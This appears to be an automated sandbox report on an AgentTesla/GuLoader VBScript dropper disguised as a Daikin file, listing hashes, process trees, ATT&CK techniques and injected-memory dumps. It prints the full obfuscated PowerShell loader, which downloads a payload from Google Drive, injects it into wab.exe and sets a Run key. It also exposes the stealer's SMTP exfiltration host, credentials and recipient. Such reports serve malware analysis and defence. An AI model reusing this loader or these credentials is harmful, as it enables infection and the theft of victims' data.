agenttesla | a1541e8095205c49f9943fa5bb38fb3601ea04e2bcaa2386b9d8850c677f924a

General

Target

DAIKIN AC SPAIN 2024.vbs
Size

8KB
MD5

edf7ea5f8de604b0caabc49fd06365b5
SHA1

1f6a6566a718b05572ddd239fb4aae1a629c2046
SHA256

a1541e8095205c49f9943fa5bb38fb3601ea04e2bcaa2386b9d8850c677f924a
SHA512

386e45884f032585937046e658ed47f772646ba94767c081d411e7cf3621fa264dd94a3e1bd764057d22dc1024b4e9da14dc49f888228fc76d61959de66c7bb9
SSDEEP

192:lLhK5s4cl1zdInbInx+VV/rOc3R9uAB8uaWUFiSoN7Sx6TYgWnXSt7qpnwxbuzkj:lLhK5hQz2n0u/yAR9nBbaB+FCuYgWXO9

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.jmfresh.sg
Port:
587
Username:
[email protected]
Password:
[email protected]
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2496 powershell.exe
7 2496 powershell.exe

flow	pid	process
5	2496	powershell.exe
7	2496	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

wab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1144 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2384 powershell.exe
1144 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2384 set thread context of 1144 2384 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2496 powershell.exe
2384 powershell.exe
2384 powershell.exe
1144 wab.exe
1144 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2384 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2496 powershell.exe
Token: SeDebugPrivilege 2384 powershell.exe
Token: SeDebugPrivilege 1144 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	ip-api.com

pid	process
1144	wab.exe

pid	process
2384	powershell.exe
1144	wab.exe

description	pid	process	target process
PID 2384 set thread context of 1144	2384	powershell.exe	wab.exe

pid	process
2496	powershell.exe
2384	powershell.exe
2384	powershell.exe
1144	wab.exe
1144	wab.exe

pid	process
2384	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	1144	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2880 wrote to memory of 2496	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 2496	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 2496	2880	WScript.exe	powershell.exe
PID 2496 wrote to memory of 2084	2496	powershell.exe	cmd.exe
PID 2496 wrote to memory of 2084	2496	powershell.exe	cmd.exe
PID 2496 wrote to memory of 2084	2496	powershell.exe	cmd.exe
PID 2496 wrote to memory of 2384	2496	powershell.exe	powershell.exe
PID 2496 wrote to memory of 2384	2496	powershell.exe	powershell.exe
PID 2496 wrote to memory of 2384	2496	powershell.exe	powershell.exe
PID 2496 wrote to memory of 2384	2496	powershell.exe	powershell.exe
PID 2384 wrote to memory of 2008	2384	powershell.exe	cmd.exe
PID 2384 wrote to memory of 2008	2384	powershell.exe	cmd.exe
PID 2384 wrote to memory of 2008	2384	powershell.exe	cmd.exe
PID 2384 wrote to memory of 2008	2384	powershell.exe	cmd.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe
PID 2384 wrote to memory of 1144	2384	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DAIKIN AC SPAIN 2024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$grovder = 1;$Datatypes='Substrin';$Datatypes+='g';Function Basalt($Jacobite){$Preallyingnlet171=$Jacobite.Length-$grovder;For($Preallying=5; $Preallying -lt $Preallyingnlet171; $Preallying+=(6)){$kbebens+=$Jacobite.$Datatypes.Invoke($Preallying, $grovder);}$kbebens;}function Rentricers($Cajolements){. ($Salified) ($Cajolements);}$Umaledes=Basalt 'CluntMSporao Regnz routiFl.dslpapirlS.leka Icho/Sa fu5Prepe.Acety0 .pti Nigh( .atrWMo,oriS,bspn ConcdRheino Berew Debas age R silNLaaneTVietc Tovb1Consa0Olief.Vejre0Victo;Ant m SharrW Endoi Fa.lnS,ned6Aande4F rre;Amts. BarmxCycli6 Chr,4S.iri;Skift MegasrHal,sv Sup.:Ev,ng1Forbe2 Genn1forud.Catec0Venst) Esti SrklaGEftereCountc,maglkFoderoTa,ja/C mpl2Ana.y0 ndel1Reemi0Posti0Ibr,d1 Sick0Trawl1 saky SubgeFSv,djiGastrrRasteeLokalf BrygoGe,anxMercu/ Sp r1 Et.n2Kinsw1 sta .neuro0 Blod ';$Virksomhedsgrupper=Basalt 'Mu,icUPerspsMisdeeMetafrEfter-LaaneAtroweg UdmeeBerolndespotMism. ';$Eksportpnr=Basalt 'VentehForcltexecrtBeha pFathes Sign:Pr fi/ Ang./Ca.erdRod rrPhytoiu convSlu be .ona.scha.g nortoOplagon balg redelReduce Wi g.Mollic wo doLagermLi,ks/ VegeuUnsa cBaggr?NoctueSli lxJomfrpIschooAllo.rTehsetBdefo= FormdOverroCiga,wBaratnNonsyl s mpomilliaOstredF,gen&TotriiCgilbdGebrk=,psyc1ForhaAPerseb wazieKaktuMTrvartAdamaLCystaUBeliguSamlesMakromAnlgsqDokumnFurro2generNTheolIWalleA philn .nfaxInd.eqCo,oirLrefo2Nona 7KalorKFilmkf ther6,ahoec.lulaT Uds _d.ckczPros,yPrikk4 Predi Toxa ';$Megans=Basalt 'Peber>Vejl, ';$Salified=Basalt ' Vddeiu,ilseDoserxKille ';$Sjaskets='Insensuous';Rentricers (Basalt '.itreSU bale MoodtPoori-ReverCLawino,onfinTartrt .enae ForsnRestltRacem Unbal-ForesP F.jlaIndust ubahAxol, HippuTspist:P ess\BrobaSGlamouGl.bun FlerbPhotooCollyn OtolnPt lieMy,sptStemms Dull.Oroa tno,prxAggertNonma Rehan- Sam.VAfstaaStemml restuGalvaeChlor Serie$Sor,kSMonosjKu.tuagymnas PentkTrosse.adavtguldgsRekvi; Seks ');Rentricers (Basalt 'DunkeiChlorf.urri Hypo(ejnertFlokdeAnti,sBystatForka- ariepCoempacindetKonveh B,re UnderTCyamo:Statu\FantaS Unheu HyponPteribomordoR latnAnsvancrafte GangtLaconsStyre.LoyaltTa.texBladstKri s).fstb{.ndereB sepxFremriT.ermtAdder}Unde,;.olum ');$Misstemninger = Basalt 'ZooloeAflurc ndkhReequopr.sb Midde%Konsia S,xopDehyppOmb,sdBurnoaKaffetTatova Lay.%Mesi \RestrCNegrooKanden DespfEndoci HaevdFligeaSundhnSolkrtc.arl. ClisAledennfichet Bi,l Threa&Criti&Hydro ,eavePorticcurvoh raftoBabes Pub.$Urinr ';Rentricers (Basalt 'Gafsk$ PringLabanlFallaoOut.abunrumaKumshl,arki:ArborU Fidep DetrdInflaaP,rtirLig,ttTauro= Pent( ibircFodermBar,td Hund C vil/ PartcDutch Sex,o$MonteMHo,mii PlassSurrasFlyset,rogreBathom .hefnRegnsiHistonH bbeg.arkaeCroisrGartn)Twist ');Rentricers (Basalt 'Dispo$seas.gSrejelGraf oGe,opbnonsiaTranslGenia:AarhuNDriftodyrevnDem cr MalveTack.gEnsidiEbenes,eatetMecharUngr,aafsp.bBarralSty,ae Judi=,endi$ReligEasperk Ajl.sKal.upAethooSengerVandrt SocipIntern AbsurUnbea.IsocesRespopTtpakl StoriFe,tdtBomba(Unsk.$PostoMWryrheFastegSkovvaUn.ernAntiksSubko) Fdev ');$Eksportpnr=$Nonregistrable[0];Rentricers (Basalt 'Lod.e$RetorgzophilDadeno.rystb Kla,a UudrlSubje: OptiSCarrieAleikr U skoRa.ics,redeaInfiln RikkgBssesuBrocaiMiscon oxineTamesoAbla,u GenasBaa,d=A.tioNNoviteAmi.ow.atur- PlanOindkbbDistrj ManueT.vercAquiltUran. B,riSOrganySlagss Ba dtOutd eUrgenmEpide.Re.isNPas,eeNedlatSynar. KompWForekeEksisbBedevCSpasmlLovliiAagr.e RetrnI,dfatForre ');Rentricers (Basalt 'Wilbu$ abi,S xtroeBrothr AttroSkraasFu ktaBrigansdemngKammeuReceniSikken InsieAfka,o Br guHaptosKilob.ServaHUdkoneFendea Kon dEmmene OsterEj,fasSked.[ slng$NoritV Pyg iChassr GloekIndkasFakuloIndermHa mehLat levalgcdDyestsSpnesg verir GeoluMokespHe.kupBrodeeNonh,r Sent]Brugh= Em e$WlatsULith mSuperaSu kelGebyreSvigtd umene StrisNonsk ');$Reordering=Basalt 'deducSKnal,eTapper tvleo Wak,sLogoraPlanlnDepergCeratuDatasiHype,nIsopee IncooRe niu MinesRaiae.He.ddDSc lloBlusnw MesonMi,rolIsoamo MultaDrmmedForweFPolitiVernelRomneeUdtyn(Disco$ArrowE Un.dkKurs.sOverlpRep,eo Humor .timtfa efpMicronCoxcor Prei,Nelum$ ultK RituoSpr,glEn,erkOb,seoNort z dmyytvan,)Affie ';$Reordering=$Updart[1]+$Reordering;$Kolkozy=$Updart[0];Rentricers (Basalt 'In ov$Lightg alerlBr.twoJera bFo.inaMelaglBundh:PolypABarrenLydlst,looviLashnt tibehSardieNondis Jo.iiI.osizforsieUdd,l=Bordv(PostvTFuld,eDobbessup,etWharh- ,otaPPatelaMa netBennehBlep. Glag$ S ovKKonveoOr.opl Unlok PeroopremazInureyprdis)Reval ');while (!$Antithesize) {Rentricers (Basalt 'Misth$Inf agToponlSierso DiffbSpgefa .nerlDaf,a: AsilGKristrApoteaLandrvM,ksirMarksuace asZoosptGane,= emen$RygtetProtorQuahauPr toeGaran ') ;Rentricers $Reordering;Rentricers (Basalt 'TrettSCorchtKonsuaBurgerBrinttEnlac-aabniSRestelModereReakteSalmopEt.op Nonfo4 ned. ');Rentricers (Basalt 'Sjals$FejlfgQuakilHalvfoPizzabF,rfaaCiseclVegne:DartfA SkatnAs.artOryxui,altetFornih AmiseMa.ilsAritmiUnc.mz Nybye .ffr=,roko( ApsiT HoreeCir.usRed.etAnod - JiggP.yresaProppt pulthTrett Omta,$TruxiKAntilo M,crl Spu kDrke.oMili.zdrifty Aer,) unde ') ;Rentricers (Basalt 'Tro d$KibsegTrisulUndisoDe.debFie,ca ArtilFortu:Eu,orBPe tae.ssesgnig,trinerui Sundb ArgueRensdlUkammiloc,rgUgudee Grun= Karm$No.bogtaberlpo,sgoPetrabTvangaEle,tlHy.en:F rreEPal,duStranrPolyty .cyjtsu.roh IndoeTrieqr CalimTaarnaBomullTrdep+Espar+Anutr%Rghtt$AdvocNDeflooHelotnSubs rTracaePrdisgIsogai PhyssTabultHyrderDishea lexabSkrivlCyprae Frit.U eticAf ynoBenefuBlrehnFl.odt T na ') ;$Eksportpnr=$Nonregistrable[$Begribelige];}Rentricers (Basalt ' Lais$Faglrg SponlPalamoHyperbAbscea D.vllsy,as:u.forMBrneiiudda.lkultuiGarveeParapuAlmueaPirkskPapertKa ebi KvinvArgeni FoursStrb tAnt.reSamohr,nfrasZutug Siks=Pulpi .reemGCouloe,atiotKonfl-SpongCOplsnoSkirrnOverstd.mrreuretfnPakettPrehu Oxyc$ChiliKWhe.toLder.lToughk Shalo.ecdezGazolyForbi ');Rentricers (Basalt '.rofa$ tinag AlewlR,sisoRaadibPigtaa,rbehlMarra:SlagmOParo,vFlerueArgenrUdfaltBeredrstudid Jacoe Subdn rmstdForpaePseud Impr.=Lat.e Nonre[ SubeSGurdyyskgpesOpiumtNewsreDistimCalla.Is,diCMngecoUd.annThralv,ampheO,zoorDorsitHamme]fast,:Scutu: HenvF,ressrBise oStetim KoreB .ndea Subrs CohieOpry.6Reku 4IndfaSel irtFyrrurhel.rialk,hnForargV,ngu(Tolyl$pikarMAnatei.ellbl SangiMo,kieAdhe u,hemoaAvowakStaaltPontiiMailev Noncianalys lvet .pireKullar DesesCatal)Outwo ');Rentricers (Basalt 'atmo $Staffg,ronel Und.o Chanb Dotha Su,nl Ddsl: tudeT HjreoFremmt UdyraBandelBla di ubbltRe.igeAlpintnephrePristnUndersminig C,kli=Udste Al.em[ angoSSandky,elansVulgrtBundre MortmSejlb.BradsTInd,neUredex Ura.t,enop.RetorE O.acnStrafcVilheoSttysd freti C.ranTrngtgF,itn]Comel:Struk:pollaAVegbeSHun.eCAm tiIPratiIP,olo.Mis,nG SupeeAnergtSalvaSS,aflt,eninr.tilliP.eudnInkapg Pize(F.kus$ palaOsupe.vTchadeLau.drbrachtLatinrs oradlumb.eC,ciln OmstdZoogreNeces)Ac.in ');Rentricers (Basalt 'Penta$Trichg eftelToleroRiotob De,aaBer.ele ike:D,adyKHovedoGarvenShruftStnkei albanTennie FabrnSubdutDe,dreKristtUpbro=sjleg$SafiaTEng.no pectDenara HusklForreichowstKontoeAnar,tF,ammeAnthrnProaps,odbi.trep,sLovovuMol lbpe,ursScrivt.rmekr.lieriEquiln ,nkegNonfa(navig3 S mi0 orsa2 Har.2Milie4Syedd8Caryo,S,ipp2Nulst7.erru7Refun8Lkker7P.enu) Arr, ');Rentricers $Kontinentet;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Confidant.Ant && echo $"
3⤵
PID:2084

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$grovder = 1;$Datatypes='Substrin';$Datatypes+='g';Function Basalt($Jacobite){$Preallyingnlet171=$Jacobite.Length-$grovder;For($Preallying=5; $Preallying -lt $Preallyingnlet171; $Preallying+=(6)){$kbebens+=$Jacobite.$Datatypes.Invoke($Preallying, $grovder);}$kbebens;}function Rentricers($Cajolements){. ($Salified) ($Cajolements);}$Umaledes=Basalt 'CluntMSporao Regnz routiFl.dslpapirlS.leka Icho/Sa fu5Prepe.Acety0 .pti Nigh( .atrWMo,oriS,bspn ConcdRheino Berew Debas age R silNLaaneTVietc Tovb1Consa0Olief.Vejre0Victo;Ant m SharrW Endoi Fa.lnS,ned6Aande4F rre;Amts. BarmxCycli6 Chr,4S.iri;Skift MegasrHal,sv Sup.:Ev,ng1Forbe2 Genn1forud.Catec0Venst) Esti SrklaGEftereCountc,maglkFoderoTa,ja/C mpl2Ana.y0 ndel1Reemi0Posti0Ibr,d1 Sick0Trawl1 saky SubgeFSv,djiGastrrRasteeLokalf BrygoGe,anxMercu/ Sp r1 Et.n2Kinsw1 sta .neuro0 Blod ';$Virksomhedsgrupper=Basalt 'Mu,icUPerspsMisdeeMetafrEfter-LaaneAtroweg UdmeeBerolndespotMism. ';$Eksportpnr=Basalt 'VentehForcltexecrtBeha pFathes Sign:Pr fi/ Ang./Ca.erdRod rrPhytoiu convSlu be .ona.scha.g nortoOplagon balg redelReduce Wi g.Mollic wo doLagermLi,ks/ VegeuUnsa cBaggr?NoctueSli lxJomfrpIschooAllo.rTehsetBdefo= FormdOverroCiga,wBaratnNonsyl s mpomilliaOstredF,gen&TotriiCgilbdGebrk=,psyc1ForhaAPerseb wazieKaktuMTrvartAdamaLCystaUBeliguSamlesMakromAnlgsqDokumnFurro2generNTheolIWalleA philn .nfaxInd.eqCo,oirLrefo2Nona 7KalorKFilmkf ther6,ahoec.lulaT Uds _d.ckczPros,yPrikk4 Predi Toxa ';$Megans=Basalt 'Peber>Vejl, ';$Salified=Basalt ' Vddeiu,ilseDoserxKille ';$Sjaskets='Insensuous';Rentricers (Basalt '.itreSU bale MoodtPoori-ReverCLawino,onfinTartrt .enae ForsnRestltRacem Unbal-ForesP F.jlaIndust ubahAxol, HippuTspist:P ess\BrobaSGlamouGl.bun FlerbPhotooCollyn OtolnPt lieMy,sptStemms Dull.Oroa tno,prxAggertNonma Rehan- Sam.VAfstaaStemml restuGalvaeChlor Serie$Sor,kSMonosjKu.tuagymnas PentkTrosse.adavtguldgsRekvi; Seks ');Rentricers (Basalt 'DunkeiChlorf.urri Hypo(ejnertFlokdeAnti,sBystatForka- ariepCoempacindetKonveh B,re UnderTCyamo:Statu\FantaS Unheu HyponPteribomordoR latnAnsvancrafte GangtLaconsStyre.LoyaltTa.texBladstKri s).fstb{.ndereB sepxFremriT.ermtAdder}Unde,;.olum ');$Misstemninger = Basalt 'ZooloeAflurc ndkhReequopr.sb Midde%Konsia S,xopDehyppOmb,sdBurnoaKaffetTatova Lay.%Mesi \RestrCNegrooKanden DespfEndoci HaevdFligeaSundhnSolkrtc.arl. ClisAledennfichet Bi,l Threa&Criti&Hydro ,eavePorticcurvoh raftoBabes Pub.$Urinr ';Rentricers (Basalt 'Gafsk$ PringLabanlFallaoOut.abunrumaKumshl,arki:ArborU Fidep DetrdInflaaP,rtirLig,ttTauro= Pent( ibircFodermBar,td Hund C vil/ PartcDutch Sex,o$MonteMHo,mii PlassSurrasFlyset,rogreBathom .hefnRegnsiHistonH bbeg.arkaeCroisrGartn)Twist ');Rentricers (Basalt 'Dispo$seas.gSrejelGraf oGe,opbnonsiaTranslGenia:AarhuNDriftodyrevnDem cr MalveTack.gEnsidiEbenes,eatetMecharUngr,aafsp.bBarralSty,ae Judi=,endi$ReligEasperk Ajl.sKal.upAethooSengerVandrt SocipIntern AbsurUnbea.IsocesRespopTtpakl StoriFe,tdtBomba(Unsk.$PostoMWryrheFastegSkovvaUn.ernAntiksSubko) Fdev ');$Eksportpnr=$Nonregistrable[0];Rentricers (Basalt 'Lod.e$RetorgzophilDadeno.rystb Kla,a UudrlSubje: OptiSCarrieAleikr U skoRa.ics,redeaInfiln RikkgBssesuBrocaiMiscon oxineTamesoAbla,u GenasBaa,d=A.tioNNoviteAmi.ow.atur- PlanOindkbbDistrj ManueT.vercAquiltUran. B,riSOrganySlagss Ba dtOutd eUrgenmEpide.Re.isNPas,eeNedlatSynar. KompWForekeEksisbBedevCSpasmlLovliiAagr.e RetrnI,dfatForre ');Rentricers (Basalt 'Wilbu$ abi,S xtroeBrothr AttroSkraasFu ktaBrigansdemngKammeuReceniSikken InsieAfka,o Br guHaptosKilob.ServaHUdkoneFendea Kon dEmmene OsterEj,fasSked.[ slng$NoritV Pyg iChassr GloekIndkasFakuloIndermHa mehLat levalgcdDyestsSpnesg verir GeoluMokespHe.kupBrodeeNonh,r Sent]Brugh= Em e$WlatsULith mSuperaSu kelGebyreSvigtd umene StrisNonsk ');$Reordering=Basalt 'deducSKnal,eTapper tvleo Wak,sLogoraPlanlnDepergCeratuDatasiHype,nIsopee IncooRe niu MinesRaiae.He.ddDSc lloBlusnw MesonMi,rolIsoamo MultaDrmmedForweFPolitiVernelRomneeUdtyn(Disco$ArrowE Un.dkKurs.sOverlpRep,eo Humor .timtfa efpMicronCoxcor Prei,Nelum$ ultK RituoSpr,glEn,erkOb,seoNort z dmyytvan,)Affie ';$Reordering=$Updart[1]+$Reordering;$Kolkozy=$Updart[0];Rentricers (Basalt 'In ov$Lightg alerlBr.twoJera bFo.inaMelaglBundh:PolypABarrenLydlst,looviLashnt tibehSardieNondis Jo.iiI.osizforsieUdd,l=Bordv(PostvTFuld,eDobbessup,etWharh- ,otaPPatelaMa netBennehBlep. Glag$ S ovKKonveoOr.opl Unlok PeroopremazInureyprdis)Reval ');while (!$Antithesize) {Rentricers (Basalt 'Misth$Inf agToponlSierso DiffbSpgefa .nerlDaf,a: AsilGKristrApoteaLandrvM,ksirMarksuace asZoosptGane,= emen$RygtetProtorQuahauPr toeGaran ') ;Rentricers $Reordering;Rentricers (Basalt 'TrettSCorchtKonsuaBurgerBrinttEnlac-aabniSRestelModereReakteSalmopEt.op Nonfo4 ned. ');Rentricers (Basalt 'Sjals$FejlfgQuakilHalvfoPizzabF,rfaaCiseclVegne:DartfA SkatnAs.artOryxui,altetFornih AmiseMa.ilsAritmiUnc.mz Nybye .ffr=,roko( ApsiT HoreeCir.usRed.etAnod - JiggP.yresaProppt pulthTrett Omta,$TruxiKAntilo M,crl Spu kDrke.oMili.zdrifty Aer,) unde ') ;Rentricers (Basalt 'Tro d$KibsegTrisulUndisoDe.debFie,ca ArtilFortu:Eu,orBPe tae.ssesgnig,trinerui Sundb ArgueRensdlUkammiloc,rgUgudee Grun= Karm$No.bogtaberlpo,sgoPetrabTvangaEle,tlHy.en:F rreEPal,duStranrPolyty .cyjtsu.roh IndoeTrieqr CalimTaarnaBomullTrdep+Espar+Anutr%Rghtt$AdvocNDeflooHelotnSubs rTracaePrdisgIsogai PhyssTabultHyrderDishea lexabSkrivlCyprae Frit.U eticAf ynoBenefuBlrehnFl.odt T na ') ;$Eksportpnr=$Nonregistrable[$Begribelige];}Rentricers (Basalt ' Lais$Faglrg SponlPalamoHyperbAbscea D.vllsy,as:u.forMBrneiiudda.lkultuiGarveeParapuAlmueaPirkskPapertKa ebi KvinvArgeni FoursStrb tAnt.reSamohr,nfrasZutug Siks=Pulpi .reemGCouloe,atiotKonfl-SpongCOplsnoSkirrnOverstd.mrreuretfnPakettPrehu Oxyc$ChiliKWhe.toLder.lToughk Shalo.ecdezGazolyForbi ');Rentricers (Basalt '.rofa$ tinag AlewlR,sisoRaadibPigtaa,rbehlMarra:SlagmOParo,vFlerueArgenrUdfaltBeredrstudid Jacoe Subdn rmstdForpaePseud Impr.=Lat.e Nonre[ SubeSGurdyyskgpesOpiumtNewsreDistimCalla.Is,diCMngecoUd.annThralv,ampheO,zoorDorsitHamme]fast,:Scutu: HenvF,ressrBise oStetim KoreB .ndea Subrs CohieOpry.6Reku 4IndfaSel irtFyrrurhel.rialk,hnForargV,ngu(Tolyl$pikarMAnatei.ellbl SangiMo,kieAdhe u,hemoaAvowakStaaltPontiiMailev Noncianalys lvet .pireKullar DesesCatal)Outwo ');Rentricers (Basalt 'atmo $Staffg,ronel Und.o Chanb Dotha Su,nl Ddsl: tudeT HjreoFremmt UdyraBandelBla di ubbltRe.igeAlpintnephrePristnUndersminig C,kli=Udste Al.em[ angoSSandky,elansVulgrtBundre MortmSejlb.BradsTInd,neUredex Ura.t,enop.RetorE O.acnStrafcVilheoSttysd freti C.ranTrngtgF,itn]Comel:Struk:pollaAVegbeSHun.eCAm tiIPratiIP,olo.Mis,nG SupeeAnergtSalvaSS,aflt,eninr.tilliP.eudnInkapg Pize(F.kus$ palaOsupe.vTchadeLau.drbrachtLatinrs oradlumb.eC,ciln OmstdZoogreNeces)Ac.in ');Rentricers (Basalt 'Penta$Trichg eftelToleroRiotob De,aaBer.ele ike:D,adyKHovedoGarvenShruftStnkei albanTennie FabrnSubdutDe,dreKristtUpbro=sjleg$SafiaTEng.no pectDenara HusklForreichowstKontoeAnar,tF,ammeAnthrnProaps,odbi.trep,sLovovuMol lbpe,ursScrivt.rmekr.lieriEquiln ,nkegNonfa(navig3 S mi0 orsa2 Har.2Milie4Syedd8Caryo,S,ipp2Nulst7.erru7Refun8Lkker7P.enu) Arr, ');Rentricers $Kontinentet;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Confidant.Ant && echo $"
4⤵
PID:2008

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Confidant.Ant
Filesize
429KB

MD5
a7895718bd45ce45ba841f5e01d0c2c8

SHA1
7c45d6f75a9c8634ea6df680913d27fda491e87c

SHA256
f9b4fe7fbf2153c8052c8a7857f97e4ba17d3a6b0a91c93f970e28c33d11f7c0

SHA512
5f873870d83484207019b9ec03237317dd988cbb4fe887ba47d4aebc2c0628926e3c9565d0078499236ac95dca9f40a2b3d13d12ceb952a3f6d38c39af85e27e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U3HE80A4QWED9JA3C0J2.temp
Filesize
7KB

MD5
6ee72bbefaf4310a97144eafc6a9b228

SHA1
3ab91f755db6a9cda8254dfe132b58ffb713da00

SHA256
0df284c13127a3c776a062bf0512ff9087c83ac908d6b0e616e81ebace76de7a

SHA512
b3b7cb1dfe039e2ed737dc91aed5e5bcb1f4173290b0975f9f18225c942a539442f206818a449c506bce5f412f489d94675b79320441b24db7926b4cf2f76aaf

Download Submit
memory/1144-61-0x0000000000320000-0x0000000000362000-memory.dmp

Filesize
264KB

Download
memory/1144-67-0x0000000001390000-0x00000000031FB000-memory.dmp

Filesize
30.4MB

Download
memory/1144-64-0x0000000021BA0000-0x0000000021BE0000-memory.dmp

Filesize
256KB

Download
memory/1144-63-0x000000006F1C0000-0x000000006F8AE000-memory.dmp

Filesize
6.9MB

Download
memory/1144-32-0x0000000001390000-0x00000000031FB000-memory.dmp

Filesize
30.4MB

Download
memory/1144-69-0x000000006F1C0000-0x000000006F8AE000-memory.dmp

Filesize
6.9MB

Download
memory/1144-59-0x00000000778F0000-0x00000000779C6000-memory.dmp

Filesize
856KB

Download
memory/1144-58-0x0000000000320000-0x0000000001382000-memory.dmp

Filesize
16.4MB

Download
memory/1144-36-0x0000000077926000-0x0000000077927000-memory.dmp

Filesize
4KB

Download
memory/1144-35-0x00000000778F0000-0x00000000779C6000-memory.dmp

Filesize
856KB

Download
memory/1144-71-0x0000000021BA0000-0x0000000021BE0000-memory.dmp

Filesize
256KB

Download
memory/1144-34-0x0000000077700000-0x00000000778A9000-memory.dmp

Filesize
1.7MB

Download
memory/2384-17-0x0000000073740000-0x0000000073CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2384-20-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/2384-23-0x0000000006820000-0x000000000868B000-memory.dmp

Filesize
30.4MB

Download
memory/2384-60-0x0000000006820000-0x000000000868B000-memory.dmp

Filesize
30.4MB

Download
memory/2384-26-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

Filesize
4KB

Download
memory/2384-15-0x0000000073740000-0x0000000073CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2384-16-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/2384-28-0x0000000006820000-0x000000000868B000-memory.dmp

Filesize
30.4MB

Download
memory/2384-29-0x0000000077700000-0x00000000778A9000-memory.dmp

Filesize
1.7MB

Download
memory/2384-30-0x00000000778F0000-0x00000000779C6000-memory.dmp

Filesize
856KB

Download
memory/2384-31-0x0000000073740000-0x0000000073CEB000-memory.dmp

Filesize
5.7MB

Download
memory/2384-18-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/2384-33-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/2496-10-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2496-21-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/2496-4-0x000000001B8C0000-0x000000001BBA2000-memory.dmp

Filesize
2.9MB

Download
memory/2496-27-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2496-25-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

